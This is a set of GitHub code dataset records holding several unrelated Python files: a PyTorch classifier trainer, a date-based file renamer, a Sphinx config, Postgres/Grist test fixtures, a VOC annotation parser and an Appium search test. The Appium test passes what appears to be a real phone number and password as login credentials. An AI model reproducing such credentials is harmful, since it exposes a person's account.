use_cuda:\n data = data.cuda()\n labels = labels.cuda()\n\n out = clf_model(data)\n losses = loss_fn(out, labels)\n all_losses.append(losses.item())\n\n # Compute the gradient throughout the model graph\n losses.backward()\n optimizer.step()\n lr_scheduler.step()\n\n if idx % _LOG_INTERVAL == 0:\n lr = optimizer.param_groups[0][\"lr\"]\n print(\n f\"Epoch: {epoch} step {idx}, loss {sum(all_losses) / len(all_losses):.5}. lr: {lr:.4}\"\n )\n\n # Call evaluation function\n clf_model.eval()\n highest_score = eval_acc = eval(\n clf_model, eval_loader, use_cuda, highest_score, save_dir,\n )\n clf_model.train()\n\n print(\n f\"Epoch: {epoch}, Training loss {sum(all_losses) / len(all_losses):.5} \\n\"\n f\"Base accuracy: {eval_acc['base']:.4} \\n\"\n )\n\n\ndef eval(\n clf_model: torch.nn.Module,\n eval_loader: torch.utils.data.DataLoader,\n use_cuda: bool = False,\n previous_best: dict = None,\n save_dir: pathlib.Path = None,\n) -> float:\n \"\"\" Evalulate the model against the evaulation set. Save the best \n weights if specified. \"\"\"\n num_correct, total_num = 0, 0\n\n with torch.no_grad():\n for data, labels in eval_loader:\n\n if torch.cuda.is_available():\n data = data.cuda()\n labels = labels.cuda()\n\n out = clf_model(data)\n _, predicted = torch.max(out.data, 1)\n\n num_correct += (predicted == labels).sum().item()\n total_num += data.shape[0]\n\n accuracy = {\n \"base\": num_correct / total_num,\n }\n\n if accuracy[\"base\"] > previous_best[\"base\"]:\n print(f\"Saving model with accuracy {accuracy}.\")\n\n # Delete the previous best\n utils.save_model(clf_model, save_dir / \"classifier.pt\")\n\n return accuracy\n else:\n return previous_best\n\n\ndef create_data_loader(\n train_cfg: dict, data_dir: pathlib.Path,\n) -> Tuple[torch.utils.data.DataLoader, torch.utils.data.DataLoader]:\n batch_size = train_cfg.get(\"batch_size\", 64)\n\n assert data_dir.is_dir(), data_dir\n\n dataset = datasets.ClfDataset(data_dir, img_ext=generate_config.IMAGE_EXT,)\n loader = torch.utils.data.DataLoader(\n dataset, batch_size=batch_size, pin_memory=True, shuffle=True\n )\n return loader\n\n\ndef create_optimizer(optim_cfg: dict, model: torch.nn.Module) -> torch.optim.Optimizer:\n \"\"\" Take in optimizer config and create the optimizer for training. 
\"\"\"\n name = optim_cfg.get(\"type\", None)\n if name.lower() == \"sgd\":\n lr = float(optim_cfg[\"lr\"])\n momentum = float(optim_cfg[\"momentum\"])\n weight_decay = float(optim_cfg[\"weight_decay\"])\n optimizer = torch.optim.SGD(\n model.parameters(),\n lr=lr,\n momentum=momentum,\n weight_decay=weight_decay,\n nesterov=True,\n )\n elif name.lower() == \"rmsprop\":\n lr = float(optim_cfg[\"lr\"])\n momentum = float(optim_cfg[\"momentum\"])\n weight_decay = float(optim_cfg[\"weight_decay\"])\n optimizer = torch.optim.RMSprop(\n model.parameters(), lr=lr, momentum=momentum, weight_decay=weight_decay\n )\n else:\n raise ValueError(f\"Improper optimizer supplied {name}.\")\n\n return optimizer\n\n\nif __name__ == \"__main__\":\n torch.random.manual_seed(42)\n\n if torch.cuda.is_available():\n torch.cuda.random.manual_seed(42)\n\n parser = argparse.ArgumentParser(\n description=\"Trainer code for classifcation models.\"\n )\n parser.add_argument(\n \"--model_config\",\n required=True,\n type=pathlib.Path,\n help=\"Path to yaml model definition.\",\n )\n args = parser.parse_args()\n\n config_path = args.model_config.expanduser()\n assert config_path.is_file(), f\"Can't find {config_path}.\"\n\n # Load the model config\n config = yaml.safe_load(config_path.read_text())\n\n model_cfg = config[\"model\"]\n train_cfg = config[\"training\"]\n\n # Copy in this config file to the save dir. The config file will be used to load the\n # saved model.\n save_dir = _SAVE_DIR / (\n datetime.datetime.now().isoformat().split(\".\")[0].replace(\":\", \".\")\n )\n save_dir.mkdir(parents=True)\n shutil.copy(config_path, save_dir / \"config.yaml\")\n\n train(model_cfg, train_cfg, save_dir)\n\n # Create tar archive if best weights are saved.\n with tarfile.open(save_dir / \"classifier.tar.gz\", mode=\"w:gz\") as tar:\n for model_file in save_dir.glob(\"*\"):\n tar.add(model_file, arcname=model_file.name)\n print(f\"Saved model to {save_dir / 'classifier.tar.gz'}\")\n", "repo_name": "alexwitt23/uav-austin", "sub_path": "train/train_clf.py", "file_name": "train_clf.py", "file_ext": "py", "file_size_in_byte": 6834, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pathlib.Path", "line_number": 20, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "data_generation.generate_config.DATA_DIR", "line_number": 26, "usage_type": "attribute"}, {"api_name": "data_generation.generate_config", "line_number": 26, "usage_type": "name"}, {"api_name": "data_generation.generate_config.DATA_DIR", "line_number": 27, "usage_type": "attribute"}, {"api_name": "data_generation.generate_config", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.cuda.is_available", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 29, "usage_type": "attribute"}, {"api_name": "core.classifier.Classifier", "line_number": 33, "usage_type": "call"}, {"api_name": "core.classifier", "line_number": 33, "usage_type": "name"}, {"api_name": "data_generation.generate_config.PRECLF_SIZE", "line_number": 35, "usage_type": "attribute"}, {"api_name": "data_generation.generate_config", "line_number": 35, "usage_type": "name"}, {"api_name": "data_generation.generate_config.PRECLF_SIZE", "line_number": 36, "usage_type": "attribute"}, {"api_name": "data_generation.generate_config", "line_number": 36, "usage_type": "name"}, {"api_name": "torch.backends", "line_number": 42, "usage_type": 
"attribute"}, {"api_name": "torch.optim.lr_scheduler.OneCycleLR", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 51, "usage_type": "attribute"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 60, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "attribute"}, {"api_name": "torch.utils", "line_number": 104, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 107, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 116, "usage_type": "attribute"}, {"api_name": "torch.max", "line_number": 121, "usage_type": "call"}, {"api_name": "train.train_utils.utils.save_model", "line_number": 134, "usage_type": "call"}, {"api_name": "train.train_utils.utils", "line_number": 134, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 142, "usage_type": "attribute"}, {"api_name": "train.datasets.ClfDataset", "line_number": 148, "usage_type": "call"}, {"api_name": "train.datasets", "line_number": 148, "usage_type": "name"}, {"api_name": "data_generation.generate_config.IMAGE_EXT", "line_number": 148, "usage_type": "attribute"}, {"api_name": "data_generation.generate_config", "line_number": 148, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 149, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 149, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 143, "usage_type": "name"}, {"api_name": "torch.utils", "line_number": 143, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 155, "usage_type": "attribute"}, {"api_name": "torch.optim.SGD", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 162, "usage_type": "attribute"}, {"api_name": "torch.optim.RMSprop", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 173, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 155, "usage_type": "attribute"}, {"api_name": "torch.random.manual_seed", "line_number": 183, "usage_type": "call"}, {"api_name": "torch.random", "line_number": 183, "usage_type": "attribute"}, {"api_name": "torch.cuda.is_available", "line_number": 185, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 185, "usage_type": "attribute"}, {"api_name": "torch.cuda.random.manual_seed", "line_number": 186, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 186, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 188, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 194, "usage_type": "attribute"}, {"api_name": "yaml.safe_load", "line_number": 203, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 211, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 211, "usage_type": "attribute"}, {"api_name": "shutil.copy", "line_number": 214, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 219, "usage_type": "call"}]} +{"seq_id": "21198317732", "text": "from datetime import datetime\nimport pandas as pd\nimport os\nfrom datetime import timedelta\n\nnome_list = []\n\ndir = input(\"Input directory: \")\n\nano_inicial = input(\"Input data inicial - timestep: \")\ndata_fmt = input(\"Input formato datetime: 
\")\nano_inicial_data = datetime.strptime(ano_inicial.strip(), data_fmt)\n\ndata_final_lista = pd.DataFrame(columns=[\"data\",\"dias\"])\n\nfor nome_arquivo in os.listdir(dir):\n #print(nome_arquivo.split(\".\")[0])\n \n dias=int(nome_arquivo.split(\".\")[0])\n \n data_final = ano_inicial_data + timedelta(days=dias*3)\n data_formatada = data_final.strftime(data_fmt)\n print(data_formatada)\n \n os.rename(dir + nome_arquivo, dir + data_formatada + \".nc\")\n \n data_final_lista = data_final_lista.append({\"data\":data_formatada,\"dias\":dias}, ignore_index=True)\n\ndata_final_lista.to_csv(\"lista_datas.csv\")", "repo_name": "IgorErhardt/Cod_Bank", "sub_path": "Filename_to_YMD.py", "file_name": "Filename_to_YMD.py", "file_ext": "py", "file_size_in_byte": 853, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime.strptime", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 14, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 21, "usage_type": "call"}, {"api_name": "os.rename", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "33513543923", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# -- General configuration -----------------------------------------------------\n\nimport datetime\nimport warnings\nimport sys\nimport os\n\nwarnings.simplefilter('ignore', DeprecationWarning)\n\n# Add any Sphinx extension module names here, as strings. They can be extensions\n# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.\nextensions = [\n 'sphinx.ext.autodoc',\n 'sphinx.ext.doctest',\n 'repoze.sphinx.autointerface',\n 'sphinx.ext.viewcode',\n 'sphinx.ext.intersphinx'\n]\n\nintersphinx_mapping = {\n #'zcomponent': ('http://docs.zope.org/zope.component', None),\n 'sqla': ('http://docs.sqlalchemy.org/en/latest', None),\n 'validictory': ('http://validictory.readthedocs.org/en/latest', None),\n 'who': ('http://docs.repoze.org/who/latest', None),\n 'python3': ('http://docs.python.org/3', None),\n 'tstring': ('http://docs.pylonsproject.org/projects/translationstring/en/latest', None),\n 'venusian': ('http://docs.pylonsproject.org/projects/venusian/en/latest', None),\n}\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = ['_templates']\n\n# The suffix of source filenames.\nsource_suffix = '.rst'\n\nmaster_doc = 'index'\n\n# General information about the project.\nproject = 'edapi'\nthisyear = datetime.datetime.now().year\ncopyright = '2013-%s, Amplify Insight ' % thisyear\n\n\nversion = '1.0'\n\nrelease = version\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\nexclude_patterns = ['_build']\n\n# If true, the current module name will be prepended to all description\n# unit titles (such as .. function::).\nadd_module_names = False\n\n# The name of the Pygments (syntax highlighting) style to use.\npygments_style = 'sphinx'\n\n\n# -- Options for HTML output ---------------------------------------------------\n\nsys.path.append(os.path.abspath('_themes'))\nhtml_theme_path = ['_themes']\nhtml_theme = 'pyramid'\n\n# The name for this set of Sphinx documents. 
If None, it defaults to\n# \" v documentation\".\nhtml_title = 'EdAPI RESTful Development Framework'\n\n# A shorter title for the navigation bar. Default is the same as html_title.\n#html_short_title = None\n\n# The name of an image file (relative to this directory) to place at the top\n# of the sidebar.\n#html_logo = None\n\n# The name of an image file (within the static path) to use as favicon of the\n# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32\n# pixels large.\n#html_favicon = None\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = ['_static']\n\n# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,\n# using the given strftime format.\nhtml_last_updated_fmt = '%b %d, %Y'\n\n# If true, SmartyPants will be used to convert quotes and dashes to\n# typographically correct entities.\n#html_use_smartypants = True\n\n# Custom sidebar templates, maps document names to template names.\n#html_sidebars = {}\n\n# Additional templates that should be rendered to pages, maps page names to\n# template names.\n#html_additional_pages = {}\n\n# If false, no module index is generated.\n#html_domain_indices = True\n\n# If false, no index is generated.\n#html_use_index = True\n\n# If true, the index is split into individual pages for each letter.\n#html_split_index = False\n\n# If true, links to the reST sources are added to the pages.\n#html_show_sourcelink = True\n\nhtml_show_sphinx = False\nhtml_show_copyright = True\n\n# If true, an OpenSearch description file will be output, and all pages will\n# contain a tag referring to it. The value of this option must be the\n# base URL from which the finished HTML is served.\n#html_use_opensearch = ''\n\n# This is the file name suffix for HTML files (e.g. \".xhtml\").\n#html_file_suffix = None\n\n# Output file base name for HTML help builder.\nhtmlhelp_basename = 'edapidoc'\n\n\n# -- Options for LaTeX output --------------------------------------------------\n\nlatex_elements = {\n # The paper size ('letterpaper' or 'a4paper').\n #'papersize': 'letterpaper',\n\n # The font size ('10pt', '11pt' or '12pt').\n #'pointsize': '10pt',\n\n # Additional stuff for the LaTeX preamble.\n #'preamble': '',\n}\n\n# Grouping the document tree into LaTeX files. List of tuples\n# (source start file, target name, title, author, documentclass [howto/manual]).\nlatex_documents = [('index', 'edapi.tex', 'edapi Documentation',\n '@dip @tosako @agrebneva @dwu', 'manual'),\n ]\n\n# The name of an image file (relative to this directory) to place at the top of\n# the title page.\n#latex_logo = None\n\n# For \"manual\" documents, if this is true, then toplevel headings are parts,\n# not chapters.\n#latex_use_parts = False\n\n# If true, show page references after internal links.\n#latex_show_pagerefs = False\n\n# If true, show URL addresses after external links.\n#latex_show_urls = False\n\n# Documents to append as an appendix to all manuals.\n#latex_appendices = []\n\n# If false, no module index is generated.\n#latex_domain_indices = True\n\n\n# -- Options for manual page output --------------------------------------------\n\n# One entry per manual page. 
List of tuples\n# (source start file, name, description, authors, manual section).\nman_pages = [\n ('index', 'edapi', 'edapi Documentation',\n ['@dip @tosako @agrebneva @dwu'], 1)\n]\n\n# If true, show URL addresses after external links.\n#man_show_urls = False\n\n\n# -- Options for Texinfo output ------------------------------------------------\n\n# Grouping the document tree into Texinfo files. List of tuples\n# (source start file, target name, title, author,\n# dir menu entry, description, category)\ntexinfo_documents = [('index', 'edapi', 'edapi Documentation',\n '@dip @tosako @agrebneva @dwu', 'edapi', 'One line description of project.',\n 'Miscellaneous'),\n ]\n\n# Documents to append as an appendix to all manuals.\n#texinfo_appendices = []\n\n# If false, no module index is generated.\n#texinfo_domain_indices = True\n\n# How to display URL addresses: 'footnote', 'no', or 'inline'.\n#texinfo_show_urls = 'footnote'\n\n# If true, do not generate a @detailmenu in the \"Top\" node's menu.\n#texinfo_no_detailmenu = False\n", "repo_name": "SmarterApp/RDW_DataWarehouse", "sub_path": "edapi/docs/conf.py", "file_name": "conf.py", "file_ext": "py", "file_size_in_byte": 6457, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "warnings.simplefilter", "line_number": 10, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 42, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 42, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 64, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}]} +{"seq_id": "14382680878", "text": "from test.defaults import (GRIST_API_KEY, GRIST_DOC_ID,\n GRIST_SERVER_FROM_LOCAL, GRIST_SERVER_FROM_POSTGRES,\n POSTGRES_HOST, POSTGRES_PASSWORD, POSTGRES_PORT,\n POSTGRES_USER)\n\nimport psycopg2\nimport pytest\nfrom grist_api import GristDocAPI\n\n\n@pytest.fixture\ndef conn():\n \"\"\"\n Connection to postgres with multicorn and gristfdw installed\n \"\"\"\n with psycopg2.connect(f\"postgres://{POSTGRES_USER}:{POSTGRES_PASSWORD}@{POSTGRES_HOST}:{POSTGRES_PORT}\") as c:\n\n with c.cursor() as cur:\n cur.execute(\"\"\"\n CREATE EXTENSION IF NOT EXISTS multicorn;\n \"\"\")\n\n yield c\n\n\n@pytest.fixture\ndef server(conn):\n \"\"\"\n Sets up our external server in postgres\n \"\"\"\n with conn.cursor() as cur:\n cur.execute(f\"DROP SERVER IF EXISTS test\")\n\n with conn.cursor() as cur:\n cur.execute(f\"\"\"\n CREATE SERVER test FOREIGN DATA WRAPPER multicorn OPTIONS (\n wrapper 'gristfdw.GristForeignDataWrapper',\n api_key '{GRIST_API_KEY}',\n doc_id '{GRIST_DOC_ID}',\n server '{GRIST_SERVER_FROM_POSTGRES}'\n );\n \"\"\")\n\n yield \"test\"\n\n with conn.cursor() as cur:\n cur.execute(f\"DROP SERVER IF EXISTS test CASCADE\")\n\n\n@pytest.fixture\ndef schema(conn):\n name = \"gristfdw_schema\"\n\n with conn.cursor() as cur:\n cur.execute(f\"\"\"DROP SCHEMA IF EXISTS {name};\"\"\")\n\n with conn.cursor() as cur:\n cur.execute(f\"\"\"CREATE SCHEMA {name};\"\"\")\n\n yield name\n\n with conn.cursor() as cur:\n cur.execute(f\"\"\"DROP SCHEMA IF EXISTS {name} CASCADE;\"\"\")\n\n\n@pytest.fixture\ndef simple_table(conn, server, table_name):\n\n with conn.cursor() as cur:\n cur.execute(\"DROP FOREIGN TABLE IF EXISTS \\\"{table_name}\\\"\")\n with 
conn.cursor() as cur:\n cur.execute(f\"\"\"\n CREATE FOREIGN TABLE \\\"{table_name}\\\" (\n id BIGINT,\n col1 TEXT,\n col2 FLOAT,\n col3 BIGINT,\n col4 BOOLEAN,\n col5 DATE,\n col9 BIGINT,\n col10 BIGINT[]\n )\n SERVER {server}\n OPTIONS (table_name '{table_name}')\n \"\"\")\n yield\n with conn.cursor() as cur:\n cur.execute(\"DROP FOREIGN TABLE IF EXISTS \\\"{table_name}\\\" CASCADE\")\n\n\n@pytest.fixture\ndef grist_api(monkeypatch):\n monkeypatch.setenv(\"GRIST_API_KEY\", GRIST_API_KEY)\n return GristDocAPI(GRIST_DOC_ID, server=GRIST_SERVER_FROM_LOCAL)\n\n\n@pytest.fixture\ndef assert_grist_table(table_name, grist_api):\n def inner(expected):\n actual = grist_api.fetch_table(table_name)\n\n # Convert namedtuples to dicts\n # Filter out gristHelper_display, which is for reference columns\n actual_asdict = [\n {\n k: v\n for k, v in t._asdict().items()\n if not k.startswith(\"gristHelper_Display\")\n }\n for t in actual\n ]\n\n assert actual_asdict == expected\n\n return inner\n", "repo_name": "johncant/gristfdw", "sub_path": "test/fixtures/integration.py", "file_name": "integration.py", "file_ext": "py", "file_size_in_byte": 3107, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "psycopg2.connect", "line_number": 16, "usage_type": "call"}, {"api_name": "test.defaults.POSTGRES_USER", "line_number": 16, "usage_type": "name"}, {"api_name": "test.defaults.POSTGRES_PASSWORD", "line_number": 16, "usage_type": "name"}, {"api_name": "test.defaults.POSTGRES_HOST", "line_number": 16, "usage_type": "name"}, {"api_name": "test.defaults.POSTGRES_PORT", "line_number": 16, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 11, "usage_type": "attribute"}, {"api_name": "test.defaults.GRIST_API_KEY", "line_number": 38, "usage_type": "name"}, {"api_name": "test.defaults.GRIST_DOC_ID", "line_number": 39, "usage_type": "name"}, {"api_name": "test.defaults.GRIST_SERVER_FROM_POSTGRES", "line_number": 40, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 66, "usage_type": "attribute"}, {"api_name": "test.defaults.GRIST_API_KEY", "line_number": 93, "usage_type": "argument"}, {"api_name": "grist_api.GristDocAPI", "line_number": 94, "usage_type": "call"}, {"api_name": "test.defaults.GRIST_DOC_ID", "line_number": 94, "usage_type": "argument"}, {"api_name": "test.defaults.GRIST_SERVER_FROM_LOCAL", "line_number": 94, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 91, "usage_type": "attribute"}, {"api_name": "grist_api.fetch_table", "line_number": 100, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 97, "usage_type": "attribute"}]} +{"seq_id": "69973733929", "text": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport xml.etree.ElementTree as ET\n\n\nclasses_name = [\n \"aeroplane\", \"bicycle\", \"bird\", \"boat\", \"bottle\",\n \"bus\", \"car\", \"cat\", \"chair\", \"cow\", \"diningtable\",\n \"dog\", \"horse\", \"motorbike\", \"person\", \"pottedplant\",\n \"sheep\", \"sofa\", \"train\",\"tvmonitor\"\n]\n\nclasses_num = {\n 'aeroplane': 0, 'bicycle': 1, 'bird': 2, 'boat': 3, 'bottle': 4,\n 'bus': 5, 'car': 6, 'cat': 7, 'chair': 8, 'cow': 9, 'diningtable': 10,\n 'dog': 11, 'horse': 12, 'motorbike': 13, 'person': 14, 
'pottedplant': 15,\n 'sheep': 16, 'sofa': 17, 'train': 18, 'tvmonitor': 19\n}\n\nDATA_ROOT = \"/Volumes/projects/DataSets/VOC\"\nDATA_PATH = os.path.join(DATA_ROOT, \"VOCdevkit/\")\nOUTPUT_PATH = os.path.join(DATA_ROOT, \"pascal_voc_{}.txt\")\n\n\ndef parse_xml(xml_file, year=2007):\n \"\"\"\n Args:\n xml_file: the input xml file path\n\n Returns:\n image_path: string\n labels: list of [xmin, ymin, xmax, ymax, class]\n \"\"\"\n tree = ET.parse(xml_file)\n root = tree.getroot()\n image_path = ''\n labels = []\n\n for item in root:\n if item.tag == 'filename':\n if year == 2007:\n image_path = os.path.join(\n DATA_PATH, 'VOC2007/JPEGImages', item.text)\n if year == 2012:\n image_path = os.path.join(\n DATA_PATH, 'VOC2012/JPEGImages', item.text)\n elif item.tag == 'object':\n obj_name = item[0].text\n obj_num = classes_num[obj_name]\n bndbox = item.find(\"bndbox\")\n xmin = int(float(bndbox.find(\"xmin\").text))\n ymin = int(float(bndbox.find(\"ymin\").text))\n xmax = int(float(bndbox.find(\"xmax\").text))\n ymax = int(float(bndbox.find(\"ymax\").text))\n labels.append([xmin, ymin, xmax, ymax, obj_num])\n\n return image_path, labels\n\n\ndef convert_to_string(image_path, labels):\n out_string = ''\n out_string += image_path\n for label in labels:\n for i in label:\n out_string += ' ' + str(i)\n out_string += '\\n'\n\n return out_string\n\n\ndef run_main(year=2007):\n print(\"Start format voc {} data !\".format(year))\n out_file = open(OUTPUT_PATH.format(year), \"w\")\n if year == 2007:\n xml_dir = os.path.join(DATA_PATH, \"VOC2007/Annotations/\")\n if year == 2012:\n xml_dir = os.path.join(DATA_PATH, \"VOC2012/Annotations/\")\n\n xml_list = os.listdir(xml_dir)\n\n xml_list = [xml_dir + tmp for tmp in xml_list]\n for xml in xml_list:\n if not os.path.isfile(xml):\n print(\"{} not xml file path.\".format(xml))\n image_path, labels = parse_xml(xml, year=year)\n record = convert_to_string(image_path, labels)\n out_file.write(record)\n out_file.close()\n\nif __name__ == '__main__':\n run_main(year=2007)\n run_main(year=2012)\n", "repo_name": "liuguiyangnwpu/DL.EyeSight", "sub_path": "Others/voc/process_pascal_voc.py", "file_name": "process_pascal_voc.py", "file_ext": "py", "file_size_in_byte": 2905, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 49, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 37, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 37, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 82, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 85, "usage_type": "name"}, {"api_name": "os.path.isfile", 
"line_number": 86, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 86, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 87, "usage_type": "argument"}, {"api_name": "xml.etree.ElementTree", "line_number": 88, "usage_type": "argument"}]} +{"seq_id": "18486014884", "text": "from common.desired_cadps import desired_conf\nfrom selenium.common.exceptions import NoSuchElementException\nimport logging\nfrom selenium.webdriver.common.by import By\nimport time\nimport random\nfrom page.login_page import login\n\n\nclass Home_page(login):\n # 首页入口搜索相关元素\n home_button = (By.ID, \"com.tal.kaoyan:id/mainactivity_button_calendar\")\n search_button = (By.ID, \"com.tal.kaoyan:id/imageSearch\")\n Input_button = (By.ID, \"com.tal.kaoyan:id/customsearchview_contentedittext\")\n SouSu_button = (By.XPATH, \"//*[@text='搜索']\")\n\n def Click_Home(self):\n \"\"\"点击首页入口元素\"\"\"\n self.click(self.home_button)\n\n def Click_Search(self):\n \"\"\"点击搜索框\"\"\"\n self.click(self.search_button)\n\n def Input_Search(self, text):\n \"\"\"输入搜索内容\"\"\"\n self.clear(self.Input_button)\n self.sendKeys(self.Input_button, text)\n\n def Click_Sousu(self):\n \"\"\"点击输入内容后的搜素按钮\"\"\"\n self.click(self.SouSu_button)\n\n # 搜索滑动用例流程\n def Search_Shake_Case(self, username, psw, text):\n self.psw_login(username, psw)\n self.Click_Home()\n time.sleep(2)\n logging.info(\"====My youstar_page returns to the search youstar_page====\")\n self.Click_Search()\n self.Input_Search(text)\n logging.info(\"====Enter search content:%s====\" % text)\n self.getScreenShot(text)\n self.Click_Sousu()\n logging.info(\"====Search content succeeded===\")\n self.getScreenShot(\"Search content succeeded\")\n self.Search_swipe()\n self.Check_Search()\n\n # 滑动两次方法封装,后续用例根据自己需求封装\n def Search_swipe(self):\n for i in range(2):\n self.Swipe_left()\n logging.info(\"=====Swipe left:\" + str(i + 1) + \"次=====\")\n time.sleep(2)\n for i in range(2):\n self.Swipe_right()\n logging.info(\"=====Swipe right:\" + str(i + 1) + \"次=====\")\n time.sleep(2)\n self.getScreenShot(\"Swipe right\" + str(i + 1) + \"次\")\n for i in range(2):\n self.Swipe_Up()\n logging.info(\"=====Swipe Up:\" + str(i + 1) + \"次=====\")\n time.sleep(1)\n self.getScreenShot(\"Swipe Up\" + str(i + 1) + \"次\")\n for i in range(2):\n self.Swipe_Down()\n logging.info(\"=====Swipe Down\" + str(i + 1) + \"次=====\")\n time.sleep(1)\n self.getScreenShot(\"Swipe Down\" + str(i + 1) + \"次\")\n\n # 校验头像更换是否跟换成功,做unittest需要校验是否成功\n def Check_Search(self):\n try:\n self.findElement(self.SouSu_button)\n logging.info(\"校验元素成功!:%s\" % str(self.SouSu_button))\n return True\n\n except NoSuchElementException:\n logging.info(\"没有找到校验元素:%s\" % str(self.SouSu_button))\n return False\n\n\nif __name__ == '__main__':\n driver = desired_conf()\n L = Home_page(driver)\n L.Search_Shake_Case(username=\"13632721415\", psw=\"Chuiling@950720\", text=\"心理学\")", "repo_name": "qangcheng/-appium-test", "sub_path": "page/Home_page.py", "file_name": "Home_page.py", "file_ext": "py", "file_size_in_byte": 3136, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "page.login_page.login", "line_number": 10, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 12, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 12, "usage_type": "name"}, {"api_name": 
